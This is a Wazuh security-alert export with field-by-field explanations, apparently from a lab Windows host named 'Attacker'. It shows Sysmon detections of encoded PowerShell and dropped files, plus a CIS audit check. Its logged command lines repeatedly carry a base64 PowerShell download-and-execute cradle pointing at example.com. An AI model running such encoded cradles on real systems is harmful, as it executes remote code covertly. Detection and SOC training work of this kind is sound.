No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:02.416+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:02.416+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  85
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534342.1762953
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:00.0401311Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285022
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:00.003 ProcessGuid: {94294ddc-bd82-680a-910b-000000000e00} ProcessId: 13540 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_fgj5ikc3.txg.ps1 CreationUtcTime: 2025-04-24 22:39:00.003 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:00.003
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd82-680a-910b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fgj5ikc3.txg.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:00.003
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:39:05.369+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:05.369+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534345.1765722
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26159
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit events generated by the management of task scheduler jobs or COM+ objects. For scheduler jobs, the following are audited: - Job created. - Job deleted. - Job enabled. - Job disabled. - Job updated. For COM+ objects, the following are audited: - Catalog object added. - Catalog object updated. - Catalog object deleted. The recommended state for this setting is: Success and Failure.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The unexpected creation of scheduled tasks and COM+ objects could potentially be an indication of malicious activity. Since these types of actions are generally low volume, it may be useful to capture them in the audit logs for use during an investigation.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Other Object Access Events
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Other Object Access Events"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Other Object Access Events"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:06.352+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:06.352+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  82
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534346.1769247
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:03.9444278Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285082
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:02.373 ProcessGuid: {94294ddc-bd86-680a-940b-000000000e00} ProcessId: 5364 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd82-680a-910b-000000000e00} ParentProcessId: 13540 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:02.373
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd86-680a-940b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5364
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd82-680a-910b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:06.576+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:06.576+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  86
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534346.1777314
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:04.3702749Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285088
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:04.338 ProcessGuid: {94294ddc-bd86-680a-940b-000000000e00} ProcessId: 5364 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4t3svkop.qwu.ps1 CreationUtcTime: 2025-04-24 22:39:04.338 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:04.338
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd86-680a-940b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5364
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4t3svkop.qwu.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:04.338
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:10.603+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:10.603+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  83
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534350.1780079
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:08.2011382Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285123
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

